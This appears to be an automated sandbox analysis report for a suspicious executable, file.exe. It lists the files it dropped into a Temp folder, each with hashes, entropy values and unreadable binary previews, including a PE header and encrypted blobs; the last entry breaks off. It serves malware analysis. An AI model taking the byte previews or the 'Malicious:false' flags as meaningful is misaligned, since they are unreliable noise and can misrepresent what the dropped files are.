                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\447331\p

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):320201
                                                                                                  Entropy (8bit):7.999436524855693
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:6144:m7uI5Yp4g5RzcmIlLwUBDj5JilIVLg1Q/UTBKQbxXT2FivQ9uzjxj:mKI6p/34PhwUBD9wyLgPTLxj+iIuz9j
                                                                                                  MD5:062C5639A34320E7E35839B40F0ED702
                                                                                                  SHA1:BEC55EBD9F1D0E8505C5FFCF6214252BFF80BE72
                                                                                                  SHA-256:F72ACCBA089F7D6643EB4C50BFB8AC7C8FE96CD842F0235988C3CED5108A72A6
                                                                                                  SHA-512:25AC75E939CBFD2106991138FC6A8410D97146F42E3D06DC0539548642385D4031CF521BDB6877F8DD4CFA56E72AEBC5A80962AD1F2DA15F8D4A8B4BC26425A8
                                                                                                  Malicious:false
                                                                                                  Preview:.Od.`J...j.h.K.../...Z...a.6e.......z=Z..QO`..a.p.....8n6...........,Y.<.9....QA.H......jC>.++.iRq...C`..*.zp.bFp.NZ.......z...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....F.G.'.F...h.............p...T...p...T...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.T..,P..Myn.2..t.W.....g.........#p.......p...T...m........qx.5...x..2).U.j.....>.4#...t........~5i...A=.....wX.g.....=.a.u.C.'.&...'>....`HR.O.....me..w.`.}.......0...c..Ud...cP&..@.\jwr.......\j.....`'_.Nl.W....0....[2wz.....\>....}nsR.....s.......S...r.ie.).?...../..9..P..x.>...h......w_\...e.d..z<..k5~..a.X....F.......{b....4.1y!.O&.../>......f......p..[..J........!.&@....C..<..0..|<.y^.o. ..g7B...O..]..5oN..

                                                                                                  C:\Users\user\AppData\Local\Temp\Assure

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22528
                                                                                                  Entropy (8bit):6.601653603159352
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:8AirRanWcch01t+s6xVw9ZrJrWOLOq4oP335flCKSMlk8WLvChJd/AV5x8y:8ArnWccuUrw9ZrJNLJj33FSGWehzML
                                                                                                  MD5:9C5FAD56FE591AFBCF17FC7210281ECB
                                                                                                  SHA1:D4B89F30059C8BEDD405332B4D13FE5B947D112A
                                                                                                  SHA-256:1ACBD25A8056B2C578AC04E276AD9641403D10D8DBC2257DB22F8BFBEA33EBCD
                                                                                                  SHA-512:8FCA409016E5796CB71C27A8E4AA43CA2641C509B71CC6114758B3D926B4BBD9C0D3951A83EA75359E07F6A7A696EF324B88741F8EE40A378C12FD3BA5D73E08
                                                                                                  Malicious:false
                                                                                                  Preview:....H...t#Q.M..j...O..E.P.I..M....M.....E..H...t#Q.M..qj...O..E.P.I..#....M..y....E..H...t#Q.M..Gj...O..E.P.I.......M..O....E..@..O..e...E..E.P.I..E..........M..$....E....f..t......@..O..e...E..E.P.I .E.........M.......0.I..O..e...E..E.P.I..E......l....M.............N...O..e...E..E.P.I..E......<....M........u..M.Q.O..R.....j....).O..p,...O.j..A....E..A..E.A..M.U.E...X..U.A..E.A..E.A..E......t..M.. Z.....t..M...Z..3..E.$.I..E.].P.].]..]..]..E.......l.I.j.X.].f.E.}...W.P..E..].P.M.]..E......(%...M.....M..E.P.E.L...C...Q.E....@M..PQS.E...P.E.P.E.P.......u.Q.E.PQj..E...P.E.P.E.P......H..D1.8\1.t..@8.U..P..D1.8\1.t..@8.X..E.P...@M...p.I..M..]..]..%....M..E.$.I..#...u..B...Y.M...X..3._^[....U.......SV.M..M.W.Z....d....Z....t....Z...u..}.j.Y3.......M...D...3..F.....S.........Y..y..........}..U..M.j.XW.u.f.E...D...P................SSSj.j.SSj.S....I.j..E.SP.....M..U.........9]........u..M..E......T ..h(.I..M.........u..E..E.E.].]......u.;u.v..E.E...

                                                                                                  C:\Users\user\AppData\Local\Temp\Australian

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60416
                                                                                                  Entropy (8bit):6.699139234131258
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:zetdlf8rfKE5Km7wrH9rbjF4vvy1CThsoE:zetHufKE5Kmqd1UhlE
                                                                                                  MD5:A5F9FA23B67D3F24A2248A7ADF0A7B50
                                                                                                  SHA1:FCDE6A9A7EC66B58F35FCF6C4FFB74B55877BD6A
                                                                                                  SHA-256:2C3867A30D2D05C0D877059B96F519772CBBBD2A0D7FD7C7F2268F76F41E2107
                                                                                                  SHA-512:7BD202CAF622665F263E93B4E1B0BA6734E8FF82506EA487FE1840D9DCEAB8BBC70E0B1EED5AB5BF786C97563C9CBC06FAE2AB70A4D8A172BB5634EE1A1D6297
                                                                                                  Malicious:false
                                                                                                  Preview:.:....E..H.....Z........Q....u..E..u..............u..u.h.%J.......u .u..u..}.VW.u.jm.u.................VW...J.S......u .u.VW.u.jd.u........(........VWS......u .u.VW.u.jy.......F.........tv...tJ..........E..@..................j..Y....u...} ......$0f....P.u..u.j..q....E..H.....T........K....} ......$0.m....E..x.......+....x...........j0.u..u.j..p..p..p..........l........u .u..u..}.VW.u.jY.u.................VW.p%J.S......u .u.VW.u.jm.u.......(....V...VWS.....u .u.VW.u.jd......E..H.....~.....;.%...j...R_;...x....$...C..u .u..u..u..u.jH.u..I...............u..u.hx%J..3....u .u..u..u..u.jM.d....E.............<.....u .u..u..}.VW.u.jH.u.................VW.x%J.S......u .u.VW.u.jM.u.......(...._...VWS.....u .u.VW.u.jS......E..H..............~...f..Wu...u.j.Y..I.@.....c...=m.....X...3.;.|......;.|.F.} .......0f......P.u..u.j.V.....} ......$0f....P.u..E..u.j..p..p..p..........}....u..u..u..u.j......E..H..........................} ......$0f....P.u...l....u.j..(....}...3..u..k....M.3..u..}.

                                                                                                  C:\Users\user\AppData\Local\Temp\Backed

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:DIY-Thermocam raw data (Lepton 3.x), scale 21280--27861, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.589205
                                                                                                  Category:dropped
                                                                                                  Size (bytes):50176
                                                                                                  Entropy (8bit):6.202001029100119
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:6wsWcfcd0vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vm4uys:6wsWcfcd0vtmgMbFuz08QuklMBNIi9uf
                                                                                                  MD5:E4923AC5C4F0816638E15D99074178BA
                                                                                                  SHA1:DE1CAE1919D7A8A7C8E75EB801D1E6913836C98D
                                                                                                  SHA-256:69C2B3D548A856FC720B433E8745D06F8E1638DAA869889B415797D2E72C4E93
                                                                                                  SHA-512:3548A8D4494E9B68E18394C74F0FF86CDE9904FC064201D8FC9CF06263C8CF0FD91399EEF0684E23C18CFC208F4CAA21F0A3865941DBCD11B36BE2E41DD4E504
                                                                                                  Malicious:false
                                                                                                  Preview:..UJ.;...4UJ.k...@UJ.....PUJ.....\UJ.....hUJ.....tUJ......UJ......UJ......UJ.;....UJ......UJ......UJ......UJ......UJ......UJ......UJ......UJ.;....VJ.....$VJ.....0VJ.....<VJ.....HVJ.....TVJ.;...lVJ.....|VJ......VJ......VJ......VJ.;....VJ.. ...VJ.. ...VJ.. ...VJ.; ...VJ..$...VJ..$...WJ..$...WJ.;$.. WJ..(..0WJ..(..<WJ..(..HWJ..,..TWJ..,..`WJ..,..lWJ..0..xWJ..0...WJ..0...WJ..4...WJ..4...WJ..4...WJ..8...WJ..8...WJ..<...WJ..<...WJ..@...WJ..@...WJ..D...XJ..H...XJ..L.. XJ..P..,XJ..|..8XJ..|..HXJ.a.r.....b.g.....c.a.....z.h.-.C.H.S.....c.s.....d.a.....d.e.....e.l.....e.n.....e.s.....f.i.....f.r.....h.e.....h.u.....i.s.....i.t.....j.a.....k.o.....n.l.....n.o.....p.l.....p.t.....r.o.....r.u.....h.r.....s.k.....s.q.....s.v.....t.h.....t.r.....u.r.....i.d.....b.e.....s.l.....e.t.....l.v.....l.t.....f.a.....v.i.....h.y.....a.z.....e.u.....m.k.....a.f.....k.a.....f.o.....h.i.....m.s.....k.k.....k.y.....s.w.....u.z.....t.t.....p.a.....g.u.....t.a.....t.e.....k.n.....m.r.....s.a.....m.n.....g.l.....k.o

                                                                                                  C:\Users\user\AppData\Local\Temp\Barely

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):51200
                                                                                                  Entropy (8bit):6.615822679045742
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Mhgt2F9m+qMHUPe3vKsyJXT6TLx3nS4/33SrFv:Mq3U0Pe3vHU4S4/33SrFv
                                                                                                  MD5:3F190D8EFBC3C814B81B56987037B7DC
                                                                                                  SHA1:6B1837CA72CC8136715149A6986CDE78578D14F3
                                                                                                  SHA-256:59FAE68A446F276BEEA0EE0FC866828B20DD52790FFA5F86FB964A962DD66A4F
                                                                                                  SHA-512:F3932F638E9EF0CD2F8A638BB3166AAE64540A7FF0C2AFE7183740B1C798642CE0795455F489A4B66543CBDE0A3C6EBD418AF16AF965CC882BC3EBC17ED30E85
                                                                                                  Malicious:false
                                                                                                  Preview:".:csm.t..:&...t...#.;.r..A ........B.ft&9q.......9u.......Q.u..u..+..........9q.u...#.=!...r.9q.u.;.rh.A .....t^.:csm.u:.z..r49z.v/.B..p...t%..E$P.u .u.Q.u....u..u.R....I.... ...u .u..u$Q.u..u..u.R....... 3.@_^[].U..V.u............J...^]....a.....a...A...J.....J..U..E....P.A.P.......Y..Y..]...j<h..L.......E..E.e...]..C..E.}..w..E.P.{...YY.E.......@..E.......@..E.......x.......M..H..e..3.@.E..E..u .u..u..u.S.A........].e.......u..j...Y.e......` ..}..G..E.W.u..].S.........E..W.3.M.9O.v:k...].;D...].~".}.;D...}...k...D..@.E..M....E...A.M.;O.r.PWj.S.Q......3.].!]..}..E......E............M.d......Y_^[..}..].E.M..A..u..t...Y......M.H.......M.H..?csm.uK....uE... ...t....!...t...."...u*.}..u$..t .w......Y..t..}........PW.(...YY.j...'D.......b....x..u..e.......N....M.j.j..H..o........U..E....8csm.u6.x..u0.x. ...t..x.!...t..x."...u..x..u......3.A.H ..].3.].U..j..u..u..u.........].j.hh.L......u..u..u..D.........u......@..e..;u.th..........}.;w........G.....M..E......|...t

                                                                                                  C:\Users\user\AppData\Local\Temp\Bathroom

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22528
                                                                                                  Entropy (8bit):6.699129528400463
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:vTugTVxJZA6b6/Q/ceOIl2XDoXwT7HBXyerAPV+xleN:PT/JW6e/Q/cXIl2EX4tXyeXxleN
                                                                                                  MD5:73A5769B0D0BDA93DB733B26589113A0
                                                                                                  SHA1:BB8CABA82A5339802615B29D81DED3DCBA6151CE
                                                                                                  SHA-256:E4DB4DB3B69E13FB052A3FDE7F14CDC59BB1619E47BB10C397AE82053A7000E2
                                                                                                  SHA-512:356A5841569EBA5E90CB897A4BFD32FEECFF2E7461160A8C3AD63BDDE080399B0F8AB8262418DBC28230E67623F63E0E736FF452E67E581FA4408CB7971E8E28
                                                                                                  Malicious:false
                                                                                                  Preview:.......,...........3.3....0.......0............F..;.u...t...,.....ssN...0.....,....e3.P........,.........P..0...SP........2..7............,....j...3.P..,...............P..0...SP.................,...........tw3.3....0...j.Z......0......G..;.u.............tB..,.....ss.....0.....,....&3.P........,.........P..0...SP.!..........\...P..,...P.1...YYj.Z;..............w...\.....1..............3...3...`.....j.....`......A..Z;.u.......t\..\.....ss....`.....\....B3.P........\.........P..`...SP.p..........u.......H...0.w......................A.........x.......w...E.H;.r...............;.........,...........3...3...0......;......0......A..;.u........t@..,.....ss....0.....,....&3.P........,.........P..0...SP.........\...P..,...P....YY......j._+.3.........0;.r...7O...u...v.j.Y......;.......-.......*h.gJ...h.gJ...h.gJ...h.gJ..u.S.0.......u'..t...._^[t...l...P.}...Y.M.3........].3.PPPPP.......U..M....u..h/.........8..x$;..!M.s.....?...k.0.....M...D.(..@]..3/.........l...3.]..U..U

                                                                                                  C:\Users\user\AppData\Local\Temp\Bench

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34816
                                                                                                  Entropy (8bit):6.626969924367001
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:XViUpLSifdrdqGhSlsB4IHo5DmJ2YAuT9XCYsywaVtTSVn7XTj:XVVSoNd6sqII0RAuTtCHaVej
                                                                                                  MD5:99F0B7D1980E51CB51C040F94CA6BDA4
                                                                                                  SHA1:FB250E5D30584DB09BDB3CD3647ABB49F33B9A9A
                                                                                                  SHA-256:2EFB0040EB9A496CC6A93003C844046EFD0F93061BA02C49037E7017F2301AB0
                                                                                                  SHA-512:5380FFAA93FD9ADDB608423A27A009AF90E5BC57EE857686F5FF16DF337E3DDBFA34B64E6AFDFCC74A0C16D703BF0621AA905B804427C6ADAE99229447BB7007
                                                                                                  Malicious:false
                                                                                                  Preview:.M.SVWQQ.M..E.Q.H.2..z....u......tl.E.3..}.9x.v_...M.Q2..4.j...<.I...tH.e...>.v?.}.F..E.j..M.QP..........u....E.G....E.;>r.}...t..E.G.}.;x.r...t.Vj...t.I.P..x.I._^..[..V.q.Vj.j(..X.I.P..4.I...u.Vj(..\.I.P..8.I...u.!..>.^....U....S3.f.E....E..].PSSSSSSh ...j j..E.P..X.I..E...t!.E.P.u.S..\.I..u.....!E...`.I..E....[.....U....SV..Wk^.....S.]..k.....S.}..`...YY.N..F...3.9N.v+._....C.......S.4.Q..<.I.G...j.Y;~.r..}..].9N.t.QQQ...E.PQSWQ.v...0.I.j.W.....YY..0.I..._..^..[....U..QQ.e...E..e..SVPQ.M..E.P2..5....u......t^W3.9>vV.N........#.;.t.G...;>r..<.t....L.I.Pj..E...t.I.P..p.I...E.....t..t..Q.u...P.I...t..._..t.Vj...t.I.P..x.I.^..[....U..SWj.j...t.I.P..p.I..=\.I...j.j.j.S..P.E..0..P..d.I.j.j.j..C.P..P.E..0..P..d.I..E....C.3.PPShV.F.PP..h.I._[]...U..W.}.j..7..l.I..w..w...l.I..w...`.I..7..`.I.Wj...t.I.P..x.I.3._]...U..V...$....}..t.....<.u.j.j.j.j.... .....^]...j.j.h.....1..H.I.H.......U....SV...M.WQ.E..0....I..u....u..E.+E.+.....E....u..E.+E.+..............3....F...M..}...E......E...

                                                                                                  C:\Users\user\AppData\Local\Temp\Cake

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7168
                                                                                                  Entropy (8bit):6.341036152981317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:uRgoWPJpBhTYpJ3pJGi3NcHBvazoo9XlNQCM+kSntZ:GlWzBhTYpJWSmkzf9XlNQCM+kStZ
                                                                                                  MD5:12333550EFD9DD43718F5689EA61F5F1
                                                                                                  SHA1:AA30DC952B02FFC2649C430063103489F4E81450
                                                                                                  SHA-256:E8C81F887906F7E9AC6D28B086770DB1FC355635D79B3429ECB2607E50E65647
                                                                                                  SHA-512:27C089894B9DAF0837252F6B3277458EC5FF80C2B94FC885498512A933C7CEFCCA9CC28ABCBEA5DF2F93E0D3AC141F7E93E79B5FE93B6E0AF1716027141AB600
                                                                                                  Malicious:false
                                                                                                  Preview:$,.....D$ .....D$p$.I..HN...t$t.........D$P$.I..L$P.+N...t$T..................t$ ..t..t$ ..t..$....D$T.D$..r.......D$.......D$......x....h....D$.3.T$h.H....f9P.u#.......$t....u......F...f.x..t.T$h.|$.3............<.....@.f..Gu.A.....f..H................D$d..2.|$L.T$h.L$@9D$........F..$........Q..$.......$.....$........P..$.....$........P.t$$.........5....D$h.....j.P..$....P.D$$.@.....0......$.....,....7f..@u.....S...B....%....D$........L$.j.R.0.A.....0....D$..L$.@.t$@.D$..F.D$.;A.......h.oL...$.....fw..3..|$,.j....H#D$$j.P..$ ...P.......$........D$...j.j..@.@P.......3M.......L$ .n....L$p.D$p$.I...K...t$t........D$P$.I..L$P..K...t$T.k.............`.....$..........t$(..t7.F....F..8.u..6.4......j..v.........j.V.........D$(.....D$,......................$..3E..L$ ...............a...........)M..............~.........N.Q...g}...D$@............$$...h..K...$.....$.........$..........u..j...$......3M.P..$,...P.#.....$$.........D$@...a....j.j..@.@P.`...Q...a......!....$

                                                                                                  C:\Users\user\AppData\Local\Temp\Club

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19456
                                                                                                  Entropy (8bit):6.442249645703308
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:kqhbk+k7B/oPN72jljSKgaEVXqcBe3ASH7djM2COa:dhbVk76PJslrmTAp7djEv
                                                                                                  MD5:B6B7838D27D7D6370C4C56038270002C
                                                                                                  SHA1:3D25AF0E449EA795FE9ACB061487B74C4B4B82C2
                                                                                                  SHA-256:84FDA09356BD13134E107D49E0C4525AB7DF713B71FFD75602E8A699E2D0095C
                                                                                                  SHA-512:74839E4F3DCBF2BEC604533FC11B84A9A7AF6F37E6C7F955EE535F74CE19E85BC38BF7AD2142F3269F8E1EE95E758A18069B91654F9E5BDD8B54036E0E2AB1EF
                                                                                                  Malicious:false
                                                                                                  Preview:.....Cl.............s|PVS.@....M(.k....}..t..}....d....6..d.I...3.PPj1.6.E ..H.I..= .I.PS..U....E..P.....YVS..u.S.6..`.I..E....t-...t ...t....u&.U.M.... .U.M......M......M.U....M ..]...9}.u.9{dt..=.(M..t..A..Cd9}.u.9{`t..=.(M..t..B..C`.u..sd.s`.s\.sX.6....I..}............t...........................sPW......{....sTW......w...W..?...M.....e...E...m...f.E.f...........f.E.f...........E.+E.f............U..E..............U........u.3.A....M......j...L.I.)E.......E.+E..M.+...+.f.......M.......}.+E..E...E...}....}.+..E.f.......].....+..+.U.....+.f.......}.....+..E.......U....+...f.......U..W...f.......\...f.}...E.....E.....E..E..}..}....t.+E.f+.....f.E.f..f.......&...+E.f+.....f.E.f..f...........f...........f.}...M....}.......t.f+.....f+.f..f..f...........+.f+.....f..f..f.......................8...........SV.. .I........u!.}..t..A`.E..AX.}.........Ad.E....E....t..AX.E...........A\.|....E.JF;...O.......V.E.P.K...;.t.P...JY...M...X..........;;A...........Hj.......Y.

                                                                                                  C:\Users\user\AppData\Local\Temp\Compile

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):67584
                                                                                                  Entropy (8bit):7.997408342262568
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:SAhv62aXBmuIUaSFy6D5Ys04ZysGvrxjGmt6Du3LVil4:SN7uzOf5Yp4ZysCrdGmt6mIl4
                                                                                                  MD5:74809A51191E9BD7D017593155539330
                                                                                                  SHA1:A153914897EF035E59E60CBE28E6FAA04D37C345
                                                                                                  SHA-256:C0F4DC26A5EE8028DCD52FD647989611628677B82642FA368E146E21776F6566
                                                                                                  SHA-512:87924B083DE647476A5D493AF0CF03967CFEFB691A76D20585D3A04C0943D595D33ED388748E448D19B32F5FA0B3BE461E5B9BB9BA8CC153A46C6005EF9E5150
                                                                                                  Malicious:false
                                                                                                  Preview:.Od.`J...j.h.K.../...Z...a.6e.......z=Z..QO`..a.p.....8n6...........,Y.<.9....QA.H......jC>.++.iRq...C`..*.zp.bFp.NZ.......z...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....F.G.'.F...h.............p...T...p...T...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.T..,P..Myn.2..t.W.....g.........#p.......p...T...m........qx.5...x..2).U.j.....>.4#...t........~5i...A=.....wX.g.....=.a.u.C.'.&...'>....`HR.O.....me..w.`.}.......0...c..Ud...cP&..@.\jwr.......\j.....`'_.Nl.W....0....[2wz.....\>....}nsR.....s.......S...r.ie.).?...../..9..P..x.>...h......w_\...e.d..z<..k5~..a.X....F.......{b....4.1y!.O&.../>......f......p..[..J........!.&@....C..<..0..|<.y^.o. ..g7B...O..]..5oN..

                                                                                                  C:\Users\user\AppData\Local\Temp\Consoles

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):30720
                                                                                                  Entropy (8bit):6.710508352528447
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:/83OaSmnpPU+vNEvH1qamdsnRsYnjDORUfqK65oHzMSkCxZYL:U3OAOvHZnR2Uf9MoHzBxKL
                                                                                                  MD5:18B7ADCFBD90A1C15E9F1F6695C5D901
                                                                                                  SHA1:CF63F46B82388AEEE71BBFB8E562DE2A146AE6EE
                                                                                                  SHA-256:B30240078C64097B4256BE548703AC506E1F1243539566558AC6D5A4342EA0C2
                                                                                                  SHA-512:88925F016B92D75168770782E3BD0A9598F3779C9B17C973FCF7CD753BB55B0CF8B72C525937FF784C609846279A54A96A70554E94F7B77808E8A53B665D790C
                                                                                                  Malicious:false
                                                                                                  Preview:....$..SE..........P.T$hj..6.............t}.K..g..j..h....tk.......j..W...p.......j..6.V.......y.........o...Q......d.........Z.....j....O.......t...."g..j.S.........\$$......L$,.7......8...T$(.]....L$,.....P...9...E..H...h..M..L$0.D$......,....u..E....@.....L$,.8.X.............F......>.^.......K....M.;.......P.g...........L$,.0......v......:....@......h..M..L$0.D$.........}..u....V..D..f.x.G..........\$(......$.....A...$.....A...$.....A....$........$....P..b............$....P.L$0........@.......$.....e...D$4.\$,.D$..D$0.D$..\$$......$....P.L$0....\$,..PWVj..\{........................D$4.\$,.D$..D$0.D$..\$$.u....D$..........|$...D$..................$.....$........P.L$0.$.........$..............}..u..L$,PWV.........A.....$....P.L$0........[....$............|$...............$.....$........P.L$0.$.........$............}..u..L$,PWV.\.............$....P.L$0.m......g[....$.....0....V....u..A.............u..A.............L$ .T$...t..A......8.t9..t..A....

                                                                                                  C:\Users\user\AppData\Local\Temp\Czech

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19456
                                                                                                  Entropy (8bit):6.405089114209641
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:vFpSOcoygCYNi3E1fdL3xnoR9t6T1vgA8kX7d8ILMwS5/Uwzc9mjqM:v0gNNiOfdjxnePB/qLMH/UwA9aT
                                                                                                  MD5:008576B744929086782F21A7065AC7C6
                                                                                                  SHA1:5D4D7607A007C1A068C2079DF38FC0464B6F9A2A
                                                                                                  SHA-256:A13C473C321151D9A0A95E835686A599CC8B610CC3100878AAEBDA99C1032C5C
                                                                                                  SHA-512:BD9C81EF3711EB293C6B5A71C3C9C00915F31AB8D8718F49E4CE1C8793225A966791A2C3C965C5A749C798AF16D731EAC6D5545D35E721FF0DCA6ECF51AC7C73
                                                                                                  Malicious:false
                                                                                                  Preview:.2._^[].(.U..E(@..V..#E(WP.?..3.VQ.u..u$.u .u..u.P.E,@..V..#E,h..L.P.u.......}.....u.2..\S.....SV.5H.I.h. ..P..S3.Sh.....7..SSh.....7..h..d.Sh.....7..SCSh.....7..=.(M..u.f........[_^].(.U..E(@....#E(...P..>...M..yi.u.......Ai.Vj.Q.u..u$.u .u..u.P.E,.u.@..h..L...#E,PQ.T....u.....u.2.."j.....I..FL.=.(M..u......f........^].(.U..E(3.A...u...SVWP.W>..3...E,WQ.u.@.u$...u ...u.#E,.u.SWh..L.P.u.......u.....u.2..EWW.=H.I.h....P.....t.h..d.j.h.....6..j.j.h.....6..3.@.=.(M..u.f......_^[].(.U..SV.u.W..............E(@....#E(..@..P.=...M,..E A........#M,...u...E .}$...u...j.Q.u.WP.u..u.Rh..I.h..L.QV......].....tRj W.u .u..u.j.P....I.....................................=.(M..u......f..........2._^[].(.U....SV.u................E.3.f9.tP.......E..E..E..E.P.......E.....h>...Q..H.I...................M.......f.......7......8^8t..............PV..=........8^8t.j.S.6..X.I.2.^[....U..E(...u.j7XSVW.....P.)<..........#.t.3.E,......u @....#E,...u....U$...u...j.Q.u.RV.u..u..u.Qh..I.h8.L.PV.....}.

                                                                                                  C:\Users\user\AppData\Local\Temp\Deborah

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24061
                                                                                                  Entropy (8bit):7.262249897829757
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:mlgavhytCjWoQL9dR0Xvwp52UW1l/hw50gFQTVaeCV1VEVFJ8ZcGwGBk7/UMQ3K6:mlgaJyc3rE2UWb/hMjFQTVat3VEV3GPP
                                                                                                  MD5:C8ED52EE2DC8795B24B1A7450E852153
                                                                                                  SHA1:77DB46296FA8AF5F1AC6C9B0136AD3A39521E4DF
                                                                                                  SHA-256:8268BCDA9CB466F90B2BB49C7E2A6A23E85C2CD8C7C63170E3C07839F40B333B
                                                                                                  SHA-512:FF830E5453554B2D2B1763E648009030F00A0853695A120584F0D89B148B31D7290A8632BE57ED5CDD0F9D8B82EEB0F6DDF825537E1D7BD7558D87113B102953
                                                                                                  Malicious:false
                                                                                                  Preview:.....,...o3|3.3.3.4.4.4d4&5^=b>o>w>F?U?]?d?......H....0)010.0.0.1.1.1.1.1.2.2.3*32393.4.4.4!4.4.4.6.6.6.7.7.7$7.8.;.?........&0_0.0.0=1z1=2A2E2I2M2Q2i2m2q2u2y2}2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3.3.3!3%3)3-313a3e3i3m3q3u3y3}3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4.4.4A4E4I4M4Q4U4Y4]4a4e4i4m4q4u4y4}4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4!5%5)5-5155595=5A5E5I5M5Q5U5Y5]5a5e5i5m5q5u5y5}5.5.5.5.5.5.5.5.5.6.6L6r6.6y7.7.7.7n8{8.8.8F;.;.;&<L<!=1=T=e=!>0>....T...`2.4.4.4.4.5U5g5p5x5.5.5.5.5I6X6 8/8.8.8.8.8.8.8.8.8.8.8.8d;r;x;.;]<.?.?#?/?.........1.1.3.4m6.7r8.8.9.:.;.;5<9<=<A<E<I<M<Q<U<Y<]<a<e<i<m<q<u<y<}<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.=.=.=.=!=%=)=-=1=5=9===A=E=.=.=.>.>... ......}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.192@2a2t2.2.2.2.2M3v3.3.3.3.3(4X4.4.4.4.5t5.5.6V7.8u8.8^:.:.:.:o;.;.;.<b<.<.<.<.<.=.=.>.?...0.......1.1.1.1.2A2L2S2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3.3.3!3%3)3-

                                                                                                  C:\Users\user\AppData\Local\Temp\Desire

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):2.425293702421789
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:b3WMygaruSIKlcYaffffm4aLWWZg319stEjFto:ugar3R3GWZg3EYo
                                                                                                  MD5:1B7F48B935D786DEABE81D80E8304102
                                                                                                  SHA1:FB4563CD0145238A5219623F3D55515CFD1F9B3C
                                                                                                  SHA-256:B67FA393883721DF42E25346F033FFEA20A5775C3AD65B1CAD4995A9399EE494
